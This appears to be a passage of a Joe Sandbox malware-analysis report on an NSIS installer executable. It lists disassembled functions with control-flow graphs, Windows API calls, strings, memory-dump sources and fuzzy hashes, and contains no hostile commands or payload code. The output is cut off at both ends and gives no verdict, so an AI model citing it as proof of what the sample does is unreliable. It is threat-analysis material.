                                                  • Opcode Fuzzy Hash: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
                                                  • Instruction Fuzzy Hash: 3061C470100600AAE720AF66DD45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D
                                                  Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 222 403082-4030d0 GetTickCount GetModuleFileNameW call 406024 225 4030d2-4030d7 222->225 226 4030dc-40310a call 406534 call 405e4f call 406534 GetFileSize 222->226 227 4032b2-4032b6 225->227 234 403110 226->234 235 4031f5-403203 call 40301e 226->235 236 403115-40312c 234->236 241 403205-403208 235->241 242 403258-40325d 235->242 239 403130-403139 call 4034b1 236->239 240 40312e 236->240 248 40325f-403267 call 40301e 239->248 249 40313f-403146 239->249 240->239 244 40320a-403222 call 4034c7 call 4034b1 241->244 245 40322c-403256 GlobalAlloc call 4034c7 call 4032b9 241->245 242->227 244->242 268 403224-40322a 244->268 245->242 273 403269-40327a 245->273 248->242 252 4031c2-4031c6 249->252 253 403148-40315c call 405fdf 249->253 258 4031d0-4031d6 252->258 259 4031c8-4031cf call 40301e 252->259 253->258 271 40315e-403165 253->271 264 4031e5-4031ed 258->264 265 4031d8-4031e2 call 406a15 258->265 259->258 264->236 272 4031f3 264->272 265->264 268->242 268->245 271->258 277 403167-40316e 271->277 272->235 274 403282-403287 273->274 275 40327c 273->275 278 403288-40328e 274->278 275->274 277->258 279 403170-403177 277->279 278->278 280 403290-4032ab SetFilePointer call 405fdf 278->280 279->258 281 403179-403180 279->281 285 4032b0 280->285 281->258 283 403182-4031a2 281->283 283->242 284 4031a8-4031ac 283->284 286 4031b4-4031bc 284->286 287 4031ae-4031b2 284->287 285->227 286->258 288 4031be-4031c0 286->288 287->272 287->286 288->258
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403093
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ms63nDrOBa.exe,00000400), ref: 004030AF
                                                    • Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00406028
                                                    • Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                                                  • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ms63nDrOBa.exe,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 004030FB
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ms63nDrOBa.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-184383526
                                                  • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                  • Instruction ID: 635ab88c792e9e5f97a92d6c795dead4e0d31dcfeb410e4bc66b7a0500b41a5f
                                                  • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                  • Instruction Fuzzy Hash: DB51D371A01204AFDB109F65DD41BAE7EACEB49716F20817BF900B62D1CA7C9F408B5D
                                                  Function 00401774 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 353 401774-401799 call 402dab call 405e7a 358 4017a3-4017b5 call 406534 call 405e03 lstrcatW 353->358 359 40179b-4017a1 call 406534 353->359 364 4017ba-4017bb call 4067e2 358->364 359->364 368 4017c0-4017c4 364->368 369 4017c6-4017d0 call 406891 368->369 370 4017f7-4017fa 368->370 377 4017e2-4017f4 369->377 378 4017d2-4017e0 CompareFileTime 369->378 371 401802-40181e call 406024 370->371 372 4017fc-4017fd call 405fff 370->372 380 401820-401823 371->380 381 401892-4018bb call 4055b9 call 4032b9 371->381 372->371 377->370 378->377 382 401874-40187e call 4055b9 380->382 383 401825-401863 call 406534 * 2 call 406571 call 406534 call 405b94 380->383 393 4018c3-4018cf SetFileTime 381->393 394 4018bd-4018c1 381->394 395 401887-40188d 382->395 383->368 415 401869-40186a 383->415 397 4018d5-4018e0 FindCloseChangeNotification 393->397 394->393 394->397 398 402c38 395->398 401 4018e6-4018e9 397->401 402 402c2f-402c32 397->402 400 402c3a-402c3e 398->400 405 4018eb-4018fc call 406571 lstrcatW 401->405 406 4018fe-401901 call 406571 401->406 402->398 412 401906-4023a7 call 405b94 405->412 406->412 412->400 412->402 415->395 417 40186c-40186d 415->417 417->382
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                  • CompareFileTime.KERNEL32(-00000014,?,10.0.19045.False,10.0.19045.False,00000000,00000000,10.0.19045.False,C:\Users\user\AppData\Local\Temp\nse5B61.tmp,?,?,00000031), ref: 004017DA
                                                    • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                                    • Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                                    • Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: 10.0.19045.False$C:\Users\user\AppData\Local\Temp\nse5B61.tmp$C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll
                                                  • API String ID: 1941528284-796677359
                                                  • Opcode ID: 8561651abfa6410071d22ed99cb99f5f230de9881640b0fdfe788bbeaf189928
                                                  • Instruction ID: f453ba81f7058b6188de9b36fe697e27c0e04e304a513fa9e8a23dac1ec640eb
                                                  • Opcode Fuzzy Hash: 8561651abfa6410071d22ed99cb99f5f230de9881640b0fdfe788bbeaf189928
                                                  • Instruction Fuzzy Hash: C741C631800518BACF11BBB9DC85DBE3AB5EF41729B21423FF012B10E2DB3C8A51966D
                                                  Function 004032B9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 419 4032b9-4032d0 420 4032d2 419->420 421 4032d9-4032e2 419->421 420->421 422 4032e4 421->422 423 4032eb-4032f0 421->423 422->423 424 403300-40330d call 4034b1 423->424 425 4032f2-4032fb call 4034c7 423->425 429 403313-403317 424->429 430 40349f 424->430 425->424 431 40344a-40344c 429->431 432 40331d-403343 GetTickCount 429->432 433 4034a1-4034a2 430->433 434 40348c-40348f 431->434 435 40344e-403451 431->435 436 4034a7 432->436 437 403349-403351 432->437 438 4034aa-4034ae 433->438 439 403491 434->439 440 403494-40349d call 4034b1 434->440 435->436 441 403453 435->441 436->438 442 403353 437->442 443 403356-403364 call 4034b1 437->443 439->440 440->430 451 4034a4 440->451 445 403456-40345c 441->445 442->443 443->430 453 40336a-403373 443->453 448 403460-40346e call 4034b1 445->448 449 40345e 445->449 448->430 457 403470-40347c call 4060d6 448->457 449->448 451->436 454 403379-403399 call 406a83 453->454 461 403442-403444 454->461 462 40339f-4033b2 GetTickCount 454->462 463 403446-403448 457->463 464 40347e-403488 457->464 461->433 465 4033b4-4033bc 462->465 466 4033fd-4033ff 462->466 463->433 464->445 467 40348a 464->467 468 4033c4-4033fa MulDiv wsprintfW call 4055b9 465->468 469 4033be-4033c2 465->469 470 403401-403405 466->470 471 403436-40343a 466->471 467->436 468->466 469->466 469->468 474 403407-40340e call 4060d6 470->474 475 40341c-403427 470->475 471->437 472 403440 471->472 472->436 480 403413-403415 474->480 476 40342a-40342e 475->476 476->454 479 403434 476->479 479->436 480->463 481 403417-40341a 480->481 481->476
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$CGy
                                                  • API String ID: 551687249-3591958535
                                                  • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                  • Instruction ID: 8b929f0044e1ac0cacba81bf46ea48fcc998b80fd55e06c59bd949555b0c30d1
                                                  • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                  • Instruction Fuzzy Hash: E5515F71900219DBCF11CF95D98469F7FA8AF4076AF14417BE804BB2C0C77C9A50CBAA
                                                  Function 00405F0B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 482 405f0b-405f26 call 406534 call 405eae 487 405f28-405f2a 482->487 488 405f2c-405f39 call 4067e2 482->488 489 405f84-405f86 487->489 492 405f49-405f4d 488->492 493 405f3b-405f41 488->493 495 405f63-405f6c lstrlenW 492->495 493->487 494 405f43-405f47 493->494 494->487 494->492 496 405f6e-405f82 call 405e03 GetFileAttributesW 495->496 497 405f4f-405f56 call 406891 495->497 496->489 502 405f58-405f5b 497->502 503 405f5d-405f5e call 405e4f 497->503 502->487 502->503 503->495
                                                  APIs
                                                    • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9
                                                  • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405F64
                                                  • GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F74
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$P?z
                                                  • API String ID: 3248276644-4140600528
                                                  • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                  • Instruction ID: 4254dd577ef462a113b6af6603d7003c895b553eaebd6861c82524aaccd31353
                                                  • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                  • Instruction Fuzzy Hash: 12F02835105E5329D622333A6C05AAF1544CFC6368719067BF892B22D5CF3C8B438CBE
                                                  Function 004068B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 505 4068b8-4068d8 GetSystemDirectoryW 506 4068da 505->506 507 4068dc-4068de 505->507 506->507 508 4068e0-4068e9 507->508 509 4068ef-4068f1 507->509 508->509 510 4068eb-4068ed 508->510 511 4068f2-406925 wsprintfW LoadLibraryExW 509->511 510->511
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
                                                  • wsprintfW.USER32 ref: 0040690A
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction ID: 81ed32cd441a27d4f3f8ebc13d3c3c121413d11d2ad97d4a1e4b49bf3134d0f2
                                                  • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction Fuzzy Hash: 64F0FC31501219AACB10BB64DD0DF9B375C9B00305F10847AA646F10D0EB78D668C798
                                                  Function 00406053 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 512 406053-40605f 513 406060-406094 GetTickCount GetTempFileNameW 512->513 514 4060a3-4060a5 513->514 515 406096-406098 513->515 517 40609d-4060a0 514->517 515->513 516 40609a 515->516 516->517
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00406071
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040350D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9), ref: 0040608C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1857211195
                                                  • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction ID: c38105da250e7271fccf8508e97940083eab768234b1f6861d150eb6f31dd2f1
                                                  • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction Fuzzy Hash: 27F09076B40204BBEB00CF69ED05F9EB7ACEB95750F11803AFA01F7180E6B0A9548768
                                                  Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 518 4015c6-4015da call 402dab call 405eae 523 401636-401639 518->523 524 4015dc-4015ef call 405e30 518->524 526 401668-4022fb call 401423 523->526 527 40163b-40165a call 401423 call 406534 SetCurrentDirectoryW 523->527 531 4015f1-4015f4 524->531 532 401609-40160c call 405ae2 524->532 542 402c2f-402c3e 526->542 527->542 545 401660-401663 527->545 531->532 535 4015f6-4015fd call 405aff 531->535 541 401611-401613 532->541 535->532 549 4015ff-401602 call 405a88 535->549 546 401615-40161a 541->546 547 40162c-401634 541->547 545->542 550 401629 546->550 551 40161c-401627 GetFileAttributesW 546->551 547->523 547->524 553 401607 549->553 550->547 551->547 551->550 553->541
                                                  APIs
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                    • Part of subcall function 00405A88: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nse5B61.tmp,?,00000000,000000F0), ref: 00401652
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp, xrefs: 00401645
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp
                                                  • API String ID: 1892508949-460192656
                                                  • Opcode ID: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
                                                  • Instruction ID: 625a4e517e3d2ef51acfe74bc6df62a7a1d29dad7f850d028ad858b28003b980
                                                  • Opcode Fuzzy Hash: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
                                                  • Instruction Fuzzy Hash: 3611D031504114ABCF206FA5CD405AF36A0EF04368B29493FE945B22F1DA3D4A819B4E
                                                  Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 554 4020dd-4020e9 555 4021a8-4021aa 554->555 556 4020ef-402105 call 402dab * 2 554->556 557 4022f6-4022fb call 401423 555->557 566 402115-402124 LoadLibraryExW 556->566 567 402107-402113 GetModuleHandleW 556->567 564 402c2f-402c3e 557->564 569 402126-402135 call 406997 566->569 570 4021a1-4021a3 566->570 567->566 567->569 573 402170-402175 call 4055b9 569->573 574 402137-40213d 569->574 570->557 579 40217a-40217d 573->579 575 402156-40216e 574->575 576 40213f-40214b call 401423 574->576 575->579 576->579 587 40214d-402154 576->587 579->564 582 402183-40218d call 403ba6 579->582 582->564 586 402193-40219c FreeLibrary 582->586 586->564 587->579
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                                    • Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                                    • Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402196
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
